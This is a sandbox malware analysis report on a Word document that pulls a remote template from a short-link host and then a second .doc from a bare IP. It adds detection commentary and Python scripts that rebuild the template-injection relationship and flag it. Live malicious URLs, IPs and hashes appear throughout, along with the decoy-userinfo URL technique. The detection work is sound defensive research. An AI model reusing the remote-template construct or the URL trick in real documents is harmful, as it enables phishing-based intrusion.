Source: global trafficHTTP traffic detected: GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown | TCP traffic detected without corresponding DNS query: 216.9.224.185 (this finding is listed 31 times in the original report)
Source: global traffic | HTTP traffic detected:
  GET /3ri5DVX HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: kuhlinks.de
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
  Host: 216.9.224.185
Source: global traffic | DNS traffic detected: DNS query: kuhlinks.de
Source: global traffic | DNS traffic detected: DNS query: 185.224.9.216.in-addr.arpa
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60838
Source: unknown | Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60833 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60834 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60832 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60843 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60834
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60833
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60832
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60843
Source: unknown | HTTPS traffic detected: 172.67.144.140:443 -> 192.168.2.24:60832 version: TLS 1.2
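The network findings above have a recognisable shape: WINWORD.EXE, identified by the "ms-office; MSOffice 16" user agent, first reaches a short-link host by name (kuhlinks.de, resolved over DNS), then follows to a .doc fetched over plain HTTP from an IP literal (216.9.224.185) for which no DNS query ever occurred. The following Python is an added example, not part of the Joe Sandbox report, that runs those checks over proxy-style log lines so the same pattern can be caught outside a sandbox. The tab-separated log format, the set of hostnames treated as "resolved", the Microsoft domain allowlist and the benign third request are all constructed assumptions; the hosts, paths and user agent of the first two lines are taken from the requests shown above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Office's own HTTP stack announces itself like this (seen verbatim in the report).
OFFICE_UA = re.compile(r"\bms-office\b|\bMSOffice \d+", re.I)
DOC_EXTS = (".doc", ".docx", ".dot", ".dotx", ".dotm", ".rtf")
# Assumed benign suffixes for Office telemetry/CDN traffic; tune to your environment.
MS_SUFFIXES = ("officeapps.live.com", "office.net", "office.com",
               "microsoft.com", "live.com", "akadns.net", "msedge.net")

# Constructed proxy-style log: client, method, URL, user agent (tab separated).
# Lines 1-2 mirror the two requests in this report; line 3 is a made-up benign
# Office request added for contrast. This is not real log data.
SAMPLE_LOG = "\n".join([
    "192.168.2.24\tGET\thttps://kuhlinks.de/3ri5DVX"
    "\tMozilla/4.0 (compatible; ms-office; MSOffice 16)",
    "192.168.2.24\tGET\thttp://216.9.224.185/122/wend/"
    "swecaninsertforgoodforeeturncheclkgoodwecan___________"
    "wecaninsertforgoodforeeturncheclkgood________"
    "wecaninsertforgoodforeeturncheclkgood.doc"
    "\tMozilla/4.0 (compatible; ms-office; MSOffice 16)",
    "192.168.2.24\tGET\thttps://odc.officeapps.live.com/odc/config"
    "\tMozilla/4.0 (compatible; ms-office; MSOffice 16)",
])

# Hostnames that had a DNS answer before the connection (constructed; in practice
# build this set from the DNS log of the same time window).
RESOLVED = {"kuhlinks.de", "odc.officeapps.live.com"}


def parse_line(line):
    """Split one constructed log line into the fields the checks need."""
    client, method, url, ua = line.split("\t", 3)
    u = urlsplit(url)
    return {"client": client, "method": method, "scheme": u.scheme,
            "host": u.hostname or "", "path": u.path, "ua": ua}


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def reasons_for(req, resolved):
    """Return the list of reasons an Office-originated request looks suspicious."""
    if not OFFICE_UA.search(req["ua"]):
        return []  # only requests made by Office itself are in scope here
    reasons = []
    host = req["host"]
    if is_ip_literal(host):
        reasons.append("ip-literal-host")          # no DNS can precede this
    elif host not in resolved:
        reasons.append("no-dns-for-host")          # name used without a lookup
    if not is_ip_literal(host) and not host.endswith(MS_SUFFIXES):
        reasons.append("office-ua-to-non-microsoft-host")
    if req["path"].lower().endswith(DOC_EXTS):
        reasons.append("document-fetch")           # Office pulling another document
    if req["scheme"] == "http" and reasons:
        reasons.append("cleartext")
    return reasons


def run_detection(log_text, resolved=RESOLVED):
    """Evaluate every log line; returns (host, path, reasons) per request."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        req = parse_line(line)
        results.append((req["host"], req["path"], reasons_for(req, resolved)))
    return results


if __name__ == "__main__":
    for host, path, reasons in run_detection(SAMPLE_LOG):
        print(f"{host}{path[:40]:<42} {'SUSPICIOUS' if reasons else 'ok':<10} {reasons}")
```

The first hop on its own only trips the weakest rule (Office talking to a non-Microsoft host), which is exactly why the short-link is there; the second request is what carries the weight, and correlating the two from the same client within seconds is the stronger signal. The "no DNS" check needs a DNS log from the same time window to be meaningful; a stale cache or a hosts-file entry will produce false positives.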
Source: classification engine | Classification label: mal60.evad.winDOC@2/4@2/2
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\Desktop\~$P 7527518303 2507294.docx.doc
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{D9E48B00-04A9-4ACE-95E3-17B1C53AFEDC} - OProcSessId.dat
Source: IMP 7527518303 2507294.docx.doc | OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.1.dr | OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: IMP 7527518303 2507294.docx.doc | Virustotal: Detection: 13%
Source: IMP 7527518303 2507294.docx.doc | ReversingLabs: Detection: 16%
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: IMP 7527518303 2507294.docx.doc | Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: IMP 7527518303 2507294.docx.doc | Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.1.dr | Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.1.dr | Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: IMP 7527518303 2507294.docx.doc | Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: settings.xml.rels | Extracted files from sample: https://goodsubmitbestthings.doc@kuhlinks.de/3ri5dvx
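This extracted URL is the core finding of the report. The document carries no VBA (OLE indicators vbamacros = False); instead word/_rels/settings.xml.rels, the relationship part where Word records an attached template, points at an external resource, so Word fetches it as soon as the file is opened. Note the URL's shape: the text before the @ (goodsubmitbestthings.doc) is userinfo, not a hostname, and the host Word really connects to is kuhlinks.de; a reader or a naive string match that stops at ".doc" is misled, which is the point. The Python below is an added example, not code from the report or from Joe Sandbox, that rebuilds a minimal package carrying that relationship and extracts every external relationship from a .docx, reporting the effective host. The relationship Type (attachedTemplate) and the rest of the package contents are assumptions, since the report does not reproduce the XML.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                 "relationships/attachedTemplate")

# Constructed stand-in for the sample's word/_rels/settings.xml.rels. The Target is
# the URL the report extracted; the relationship Type is an assumption (the usual
# one for a remote template), as the report does not show the original XML.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{TEMPLATE_TYPE}"
    Target="https://goodsubmitbestthings.doc@kuhlinks.de/3ri5dvx" TargetMode="External"/>
</Relationships>
"""


def build_sample_docx() -> bytes:
    """Assemble a minimal OOXML package (constructed, not the real sample) in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels", SAMPLE_RELS)
        # The report also lists footer2.xml.rels; an empty one stands in for it here.
        z.writestr("word/_rels/footer2.xml.rels", f'<Relationships xmlns="{REL_NS}"/>')
    return buf.getvalue()


def external_relationships(docx_bytes: bytes):
    """Return (part, short type, target) for every TargetMode="External" relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, short_type, rel.get("Target", "")))
    return found


def effective_host(target: str):
    """Host the client will actually contact, and the userinfo that precedes '@' if any."""
    parts = urlsplit(target)
    return parts.hostname, parts.username


def triage(docx_bytes: bytes):
    """Summarise each external relationship and flag the ones worth blocking on."""
    rows = []
    for part, rel_type, target in external_relationships(docx_bytes):
        host, userinfo = effective_host(target)
        rows.append({
            "part": part, "type": rel_type, "target": target,
            "host": host, "userinfo": userinfo,
            # A remote template, or any URL that hides its host behind userinfo,
            # is enough to pull the file for a closer look.
            "suspicious": rel_type == "attachedTemplate" or userinfo is not None,
        })
    return rows


if __name__ == "__main__":
    for row in triage(build_sample_docx()):
        print(f"{row['part']}: {row['type']} -> {row['target']}")
        print(f"  connects to: {row['host']}   userinfo: {row['userinfo']}   "
              f"suspicious: {row['suspicious']}")
```

On a real file, call triage(open(path, "rb").read()). Block and hunt on the hostname the parser returns (kuhlinks.de here), not on the decoy string before the @; and treat any attachedTemplate, oleObject or frame relationship with TargetMode="External" pointing off the local machine as something to detonate or strip before delivery.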
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (listed 61 times in the original report)
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (listed 87 times in the original report)
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information queried: ProcessInformation
MITRE ATT&CK matrix (rebuilt from the flattened matrix, one line per tactic, cells in matrix order; the number in parentheses is the signature-count badge the matrix shows on matched techniques, all other cells are the unmatched matrix template):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (11); Exploitation for Client Execution (3); At; Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (1); Binary Padding; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (1); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (2)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph
  ID: 1654507
  Sample: IMP 7527518303 2507294.docx.doc
  Start date: 02/04/2025
  Architecture: WINDOWS
  Score: 60
  Start -> signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Contains an external reference to another file
  Start -> DNS/IP: res-stls-prod.edgesuite.net.globalredir.akadns88.net; kuhlinks.de; 2 other IPs or domains
  Start -> process: WINWORD.EXE started (graph badges: 508, 110)
  WINWORD.EXE -> 216.9.224.185 (ports 60836, 60840, 80; ATT-INTERNET4US, Reserved)
  WINWORD.EXE -> kuhlinks.de, 172.67.144.140 (ports 443, 60832, 60833; CLOUDFLARENETUS, United States)
  WINWORD.EXE -> dropped file: IMP 7527518303 2507294.docx.doc (copy), Microsoft

Source | Detection | Scanner | Label
IMP 7527518303 2507294.docx.doc | 14% | Virustotal |
IMP 7527518303 2507294.docx.doc | 17% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
https://kuhlinks.de/3ri5DVX | 0% | Avira URL Cloud | safe
http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
a726.dscd.akamai.net | 23.219.161.152 | true | false | | high
s-0005.dual-s-msedge.net | 52.123.129.14 | true | false | | high
kuhlinks.de | 172.67.144.140 | true | false | | high
185.224.9.216.in-addr.arpa | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc | true | Avira URL Cloud: safe | unknown
https://kuhlinks.de/3ri5DVX | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.144.140 | kuhlinks.de | United States | 13335 | CLOUDFLARENETUS | false
216.9.224.185 | unknown | Reserved | 7018 | ATT-INTERNET4US | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1654507
Start date and time: 2025-04-02 11:59:31 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: IMP 7527518303 2507294.docx.doc
Detection: MAL
Classification: mal60.evad.winDOC@2/4@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .doc
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.20.38, 52.109.4.7, 52.182.143.211, 52.109.8.36, 52.111.251.16, 52.111.251.18, 52.111.251.19, 52.111.251.17, 23.33.42.72, 23.33.42.76, 52.123.129.14, 40.126.24.146, 23.219.161.152, 20.109.210.53
          • Excluded domains from analysis (whitelisted): us1.odcsm1.live.com.akadns.net, odc.officeapps.live.com, slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, templatesmetadata.office.net.edgekey.net, res-1.cdn.office.net, mobile.events.data.microsoft.com, prod-canc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, osiprod-eus2-bronze-azsc-000.eastus2.cloudapp.azure.com, templatesmetadata.office.net, c.pki.goog, ecs.office.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, res-stls-prod.edgesuite.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, eus2-azsc-000.odc.officeapps.live.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, n
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.144.140 | Solicitud de cotizaci#U00f3n.xls | Get hash | malicious | Remcos, DBatLoader | Browse |

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a726.dscd.akamai.net | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 23.200.0.22
a726.dscd.akamai.net | Provider Document.html | Get hash | malicious | HTMLPhisher | Browse | 23.62.47.145
a726.dscd.akamai.net | VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm | Get hash | malicious | Unknown | Browse | 23.206.121.16
a726.dscd.akamai.net | http://benedictocollege1-my.sharepoint.com/:f:/g/personal/ryacassey_montillano_benedictocollege_edu_ph/EqNqk_rEp1RHm2UFQLxbuYoBbS5GFhosjapIHgSzIrrsZQ?e=4SvNeC | Get hash | malicious | Unknown | Browse | 23.206.121.35
a726.dscd.akamai.net | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 23.206.121.45
a726.dscd.akamai.net | Message.eml | Get hash | malicious | Unknown | Browse | 23.206.121.54
a726.dscd.akamai.net | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 23.53.126.44
a726.dscd.akamai.net | NMDC01042025.xls | Get hash | malicious | Unknown | Browse | 23.204.152.198
a726.dscd.akamai.net | Message.eml | Get hash | malicious | Unknown | Browse | 23.53.126.12
a726.dscd.akamai.net | RFQ-Pietro Bonaiti P0 24081128 04.xlsx | Get hash | malicious | Unknown | Browse | 23.206.121.54
kuhlinks.de | Solicitud de cotizaci#U00f3n.xls | Get hash | malicious | Remcos, DBatLoader | Browse | 104.21.47.51
s-0005.dual-s-msedge.net | Newsletter Avril 2025 (206Ko).msg | Get hash | malicious | Unknown | Browse | 52.123.128.14
s-0005.dual-s-msedge.net | FW What it takes to build a great search mobile experience.msg | Get hash | malicious | Unknown | Browse | 52.123.128.14
s-0005.dual-s-msedge.net | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 52.123.128.14
s-0005.dual-s-msedge.net | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 52.123.128.14
s-0005.dual-s-msedge.net | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 52.123.128.14
s-0005.dual-s-msedge.net | Revised - Buncombe county government 2025 Handbook33469.doc | Get hash | malicious | Unknown | Browse | 52.123.129.14
s-0005.dual-s-msedge.net | VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm | Get hash | malicious | Unknown | Browse | 52.123.128.14
s-0005.dual-s-msedge.net | VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm | Get hash | malicious | Unknown | Browse | 52.123.129.14
s-0005.dual-s-msedge.net | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 52.123.129.14

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | T1-mh1-310325.bat | Get hash | malicious | Braodo | Browse | 104.17.112.233
CLOUDFLARENETUS | eSYM74Zqsg.bat | Get hash | malicious | Unknown | Browse | 104.18.111.161
CLOUDFLARENETUS | OPhdi5uSb6.exe | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | 172.67.168.77
CLOUDFLARENETUS | file.exe | Get hash | malicious | Amadey, LummaC Stealer | Browse | 172.67.197.67
CLOUDFLARENETUS | file.exe | Get hash | malicious | Amadey, LummaC Stealer | Browse | 172.67.197.67
CLOUDFLARENETUS | NEW ORDER_PDF.exe | Get hash | malicious | FormBook | Browse | 172.67.132.85
CLOUDFLARENETUS | rRoklubber.exe | Get hash | malicious | Snake Keylogger | Browse | 104.21.32.1
CLOUDFLARENETUS | Draft Copy.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.48.1
CLOUDFLARENETUS | invoice.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.131.170
ATT-INTERNET4US | xd.mips.elf | Get hash | malicious | Mirai | Browse | 108.76.39.172
ATT-INTERNET4US | xd.powerpc-440fp.elf | Get hash | malicious | Mirai | Browse | 68.90.163.145
ATT-INTERNET4US | xd.arm.elf | Get hash | malicious | Mirai | Browse | 108.219.97.68
ATT-INTERNET4US | xd.x86.elf | Get hash | malicious | Mirai | Browse | 108.253.120.12
ATT-INTERNET4US | xd.arm7.elf | Get hash | malicious | Mirai | Browse | 172.146.100.88
ATT-INTERNET4US | xd.i686.elf | Get hash | malicious | Mirai | Browse | 99.116.15.45
ATT-INTERNET4US | xd.sh4.elf | Get hash | malicious | Mirai | Browse | 63.207.1.40
ATT-INTERNET4US | xd.spc.elf | Get hash | malicious | Mirai | Browse | 70.132.145.224
ATT-INTERNET4US | xd.mpsl.elf | Get hash | malicious | Mirai | Browse | 108.80.129.103

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
258a5a1e95b8a911872bae9081526644 | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | Nuevo Orden.xlam.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | Inquiry-140-120.xla.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | NMDC01042025.xls | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | RFQ-Pietro Bonaiti P0 24081128 04.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | PO#267759.xlam.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | PO223445.xlam.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | transferencia interbancaria_swift.xlam.xlsx | Get hash | malicious | Unknown | Browse | 172.67.144.140
258a5a1e95b8a911872bae9081526644 | swift PI RSEK25001.docx.doc | Get hash | malicious | Unknown | Browse | 172.67.144.140

No context
Process: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type: Microsoft Word 2007+
Category: dropped
Size (bytes): 213027
Entropy (8bit): 7.948399481754145
Encrypted: false
SSDEEP: 6144:WBRGkODAZzMhFeWcgtl9h7AZIDRNX3WpYT5+vq/3+:WBRGtIYhcHgtlT7AZgzX3WpYd+Cf+
MD5: B2CFE4E497E5425F37473132A266CAEE
SHA1: EB82E689BC8BA6A7F9E3EFC41E7285EB55FE2932
SHA-256: 41EEE7653732F460B1B8EAF06CE15171993B4161B748690462B7B5F7C2D74E92
SHA-512: 6D214462ED92A12C28B26C2D41B4439252089AAF7ECA4C855EF6795214EBA0BCA322FEA4E050414814D59C191948C07AED53E60236BB98740A6CE3DA664A973F
Malicious: true
Reputation: low
            Preview:PK..........!.Jj.@............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0....."..."..j.......`.Ic.<SH.~'M[!D.r..I.....c;...[g.'Hh./.i1...*h....w.;?....Z...+@q9.q2._E...=..!..Rb.SX...#uHN.?....zT......'.S.!.k...Rv....\-..>..*.q]}.w..fM....T..T.8...~E.o...\.`c"..=....}...M.:TK.%...Jc.@....>+...A..KFCv...Q...sHZ......wj1....H0.........._O..........Q.Dx....Q.....C .h...I.B..#1l......!.~=A/|..........^.H...?._..o^....^..S... .H.B...._?...2.,9....<x.................Y...A7.h.ox...6
Process: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.995306296759881
Encrypted: false
SSDEEP: 3:blRmMF/PZH/bji/fl0/+KBJliE9DxV:bzmMW/6/+Slf9P
MD5: 9E120176582E3EA25644F0FB8DB76AB8
SHA1: 1E8EF22465F0C2389DA68098DDAEC62F0503D45E
SHA-256: FA1D701EE83AFB14841553BB5715B3057A0B6B664CC3912534B3F17AC0C965C7
SHA-512: F426D8613414550ECD3251D9E50FC4F1F703BB15BC9D96E4A74A7E969E039769985ECDC0617756FE85DEA07B793D05070AA9F7B3EC7C04280F2F54A9DE123FDD
Malicious: false
Reputation: low
            Preview:.user..................................................M.a.o.g.a........5....p<.BV...p<.BV...................................8}......dE..R..................6..<
Process: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type: Microsoft Word 2007+
Category: dropped
Size (bytes): 213027
Entropy (8bit): 7.948399481754145
Encrypted: false
SSDEEP: 6144:WBRGkODAZzMhFeWcgtl9h7AZIDRNX3WpYT5+vq/3+:WBRGtIYhcHgtlT7AZgzX3WpYd+Cf+
MD5: B2CFE4E497E5425F37473132A266CAEE
SHA1: EB82E689BC8BA6A7F9E3EFC41E7285EB55FE2932
SHA-256: 41EEE7653732F460B1B8EAF06CE15171993B4161B748690462B7B5F7C2D74E92
SHA-512: 6D214462ED92A12C28B26C2D41B4439252089AAF7ECA4C855EF6795214EBA0BCA322FEA4E050414814D59C191948C07AED53E60236BB98740A6CE3DA664A973F
Malicious: false
Reputation: low
            Preview:PK..........!.Jj.@............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0....."..."..j.......`.Ic.<SH.~'M[!D.r..I.....c;...[g.'Hh./.i1...*h....w.;?....Z...+@q9.q2._E...=..!..Rb.SX...#uHN.?....zT......'.S.!.k...Rv....\-..>..*.q]}.w..fM....T..T.8...~E.o...\.`c"..=....}...M.:TK.%...Jc.@....>+...A..KFCv...Q...sHZ......wj1....H0.........._O..........Q.Dx....Q.....C .h...I.B..#1l......!.~=A/|..........^.H...?._..o^....^..S... .H.B...._?...2.,9....<x.................Y...A7.h.ox...6
Process: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
